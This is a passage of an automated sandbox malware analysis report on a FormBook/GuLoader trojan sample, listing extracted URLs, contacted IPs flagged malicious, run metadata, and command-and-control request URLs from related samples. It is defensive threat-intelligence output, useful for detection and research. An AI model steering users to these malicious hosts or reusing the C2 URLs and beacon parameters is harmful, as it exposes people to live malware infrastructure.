                                                                                    https://www.msn.com/de-de/sport/motorsport/nascar/renn-kalenderexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://yastatic.net/pcode/adfox/loader.jsRAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://i3.cdn-image.com/__media__/pics/29590/bg1.png)RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeSexplorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://word.office.comexplorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.jsRAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.nic.ru/hcp2/sites/www.legalinmedia.online/?leg4590245explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.nic.ru/catalog/hosting/dedicated/RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://nsis.sf.net/NSIS_ErrorErrorfjerbregners_patrol.exefalse
                                                                                                      		high
                                                                                                      https://outlook.comexplorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.com/favicon.icomsdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com/de-de/finanzen/top-stories/nach-explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.msn.com/de-de/nachrichten/other/donald-trumps-ex-berater-johnexplorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://deff.nelrexplorer.exe, 00000005.00000003.4946620557.000000000CECF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.msn.com/de-de/lifestyle/leben/mutter-lexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.msn.com/de-de/sport/fussball/coppa-italiaexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.msn.com/de-de/sport/fussball/englandexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.msn.com/de-de/reisen/nachrichten/passagier-hatte-vibration-bemerkt-lufthansa-flug-nach-mexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://nsis.sf.net/NSIS_Errorfjerbregners_patrol.exefalse
                                                                                                                        		high
                                                                                                                        https://www.msn.com/de-de/nachrichten/bildergalerien/photo-of-the-day/ss-AA1ePdb4explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Teaser/tempdrop1.svgexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.quovadis.bm0fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.cssRAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.msn.com/de-de/auto/nachrichten/das-haben-sie-noch-nie-gesehen-roboter-jagt-falschparker/explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://wamiz.de/neuigkeiten/37247/frauen-auto-kamera-aussetzenexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.msn.com/de-de/nachrichten/politik/ukraine-krieg-militexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.msn.com/de-de/nachrichten/welt/ecowas-plant-militexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.msn.com/de-de/wetter/topgeschichten/mega-sturm-kommt-meteorologe-warnt-darum-wird-es-lebexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000005.00000000.4265412903.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4935000339.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5577510077.0000000009306000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://www.msn.com/de-de/lifestyle/liebe-beziehung/frauen-steigen-aus-dem-auto-was-sie-tun-ist-unerexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://i3.cdn-image.com/__media__/pics/28903/search.png)RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyacexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.msn.com/de-de/sport/fussball/frankreichexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://doc-0g-2c-docs.googleusercontent.com/fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B48000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.microexplorer.exe, 00000005.00000002.5581487828.000000000A7A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.4259799715.0000000002C30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5580560824.000000000A1D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/AQI/uspl03.svgexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeS-darkexplorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.nic.ru/hcpRAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.msn.com/de-de/unterhaltung/other/cexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdfjerbregners_patrol.exe, 00000002.00000001.3579838555.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfRAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://assets.msn.com/weathermapdata/1/static/test/finance/CurrencyReddown.svgexplorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.msn.com/de-de/nachrichten/other/donald-trumps-ex-berater-john-bolton-usa-werden-die-natoexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.nic.ru/catalog/hosting/shared/RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.msn.com/de-de/nachrichten/politik/general-a-d-ben-hodges-warum-gebt-ihr-nicht-einfach-niexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppwexplorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://api.msn.com/v1/news/Feed/Windows?activityId=3076063914DA481793CFCA20D17646AC&timeOut=5000&ocexplorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          162.0.239.145
                                                                                                                                                                          		www.sonokmall.infoCanada
                                                                                                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                                                                                                          142.250.185.206
                                                                                                                                                                          		drive.google.comUnited States
                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                          142.250.185.129
                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                          96.44.182.131
                                                                                                                                                                          		handsome-sex.comUnited States
                                                                                                                                                                          		8100ASN-QUADRANET-GLOBALUStrue
                                                                                                                                                                          51.79.96.115
                                                                                                                                                                          		wolfcapital.topCanada
                                                                                                                                                                          		16276OVHFRtrue
                                                                                                                                                                          91.189.114.27
                                                                                                                                                                          		www.legalinmedia.onlineRussian Federation
                                                                                                                                                                          		48287RU-CENTERRUtrue
                                                                                                                                                                          43.154.67.170
                                                                                                                                                                          		www.fgnvcmef.clickJapan4249LILLY-ASUStrue
                                                                                                                                                                          107.148.17.67
                                                                                                                                                                          		www.kepaoqin.topUnited States
                                                                                                                                                                          		54600PEGTECHINCUStrue
                                                                                                                                                                          119.18.54.51
                                                                                                                                                                          		www.ladakhzesmo.comIndia
                                                                                                                                                                          		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                                                                                          104.21.62.30
                                                                                                                                                                          		www.zenturasolutions.comUnited States
                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                          169.150.247.39
                                                                                                                                                                          		www.openlend.latUnited States
                                                                                                                                                                          		2711SPIRITTEL-ASUStrue

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                          Analysis ID:1289248
                                                                                                                                                                          Start date and time:2023-08-10 10:14:46 +02:00
                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 12m 30s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                                          Number of analysed new started processes analysed:5
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • HDC enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample file name:fjerbregners_patrol.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/8@12/11
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HDC Information:
                                                                                                                                                                          • Successful, ratio: 18.1% (good quality ratio 17.4%)
                                                                                                                                                                          • Quality average: 78.9%
                                                                                                                                                                          • Quality standard deviation: 27.3%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 90%
                                                                                                                                                                          • Number of executed functions: 62
                                                                                                                                                                          • Number of non-executed functions: 247
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          10:18:48API Interceptor865x Sleep call for process: explorer.exe modified

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          162.0.239.145rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.sonokmall.info/aw8o/?-wkb=4wyyFbo3wf4GPkojX9lv2Hi85TpF3a9bJFCVb7ujVjad/QnKgAM8Rmx0lfLSMwhbZvHAQ1fpLn066tx6/q5vMcOgf2mjw6QkIA==&_-=axSpBNXszGs9cCrW
                                                                                                                                                                          96.44.182.131rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.handsome-sex.com/aw8o/?-wkb=9zOZF6sYY9k/tdVrbXWkN8sA2agMahsOyqxI7TXZC8QU+v+BgRTEySnaHWgeO9Bnd0OQd62k8t+QBgqfLMlzOLISTcCK1ibTiw==&_-=axSpBNXszGs9cCrW
                                                                                                                                                                          51.79.96.115rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.wolfcapital.top/aw8o/?-wkb=1Jf62kTrmMrtvW9nTGcQzL1qxjpfbwlqHSE5+yviuOiwQb8X0elvNWjLUSKlufaHfU8RKiOE6AarqIMWhrvJVzj6gCO1stp4zw==&_-=axSpBNXszGs9cCrW
                                                                                                                                                                          91.189.114.27rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.legalinmedia.online/aw8o/?-wkb=csQIKxSiAps2oY2HkWP4m2UAXHoJbYdtF0OMXDtSslnXYUx4jfx20xSs5MiYBfJn4Wt0LZQ+kGwlvq1TpxG6ruHpMlvoexuWNA==&_-=axSpBNXszGs9cCrW
                                                                                                                                                                          RFQ#_R&E-S194.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.legalinmedia.online/v8zb/?RGFv=ae8j7B4Y3f&4Z=AeRC1bAZ1qkyPFW6CuZIiPeiUkD4E3kn8j3io9dIbeBTTmPx1vyNgi05/y7rDzFYuKu5T9g142WmEkOSdL2oaJUOh3Q6oblAtQ==
                                                                                                                                                                          HSBC_Advice,pdf.bat.exeGet hashmaliciousDBatLoader, FormBookBrowse
